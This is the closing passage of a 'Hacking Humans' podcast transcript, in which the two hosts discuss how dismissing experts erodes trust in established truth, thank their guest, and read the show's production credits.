Dave Bittner: ...It makes it very easy to dismiss things, to sort of hand-wave away. You know, and I think that's a problem that's been growing lately. You know, it's like, well, sure, you're a doctor, but I do my own research.
Joe Carrigan: Right (laughter).
Dave Bittner: You know? Oh, OK.
Joe Carrigan: Right.
Dave Bittner: We need - a functioning society needs trusted experts.
Joe Carrigan: Yes.
Dave Bittner: Right?
Joe Carrigan: I would agree.
Dave Bittner: And if we chip away at people's confidence in those experts - which is not to say that they can't be challenged or questioned or anything like that. All those things come with expertise. But at the same time, we have to have ways of establishing what is ground truth.
Joe Carrigan: Right.
Dave Bittner: And I think things like this chip away at that, and that concerns me, I think. And it sounds like it concerns you, too.
Joe Carrigan: It does very much so.
Dave Bittner: Yeah. All right. Well, our thanks to Etay Maor for joining us. We do appreciate him taking the time.
Dave Bittner: That is our show. We want to thank all of you for listening. And, of course, we want to thank the Johns Hopkins University Information Security Institute for their participation. You can learn more at isi.jhu.edu. The "Hacking Humans" podcast is proudly produced in Maryland at the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies. Our senior producer is Jennifer Eiben. Our executive editor is Peter Kilpe. I'm Dave Bittner.
Joe Carrigan: And I'm Joe Carrigan.
Dave Bittner: Thanks for listening.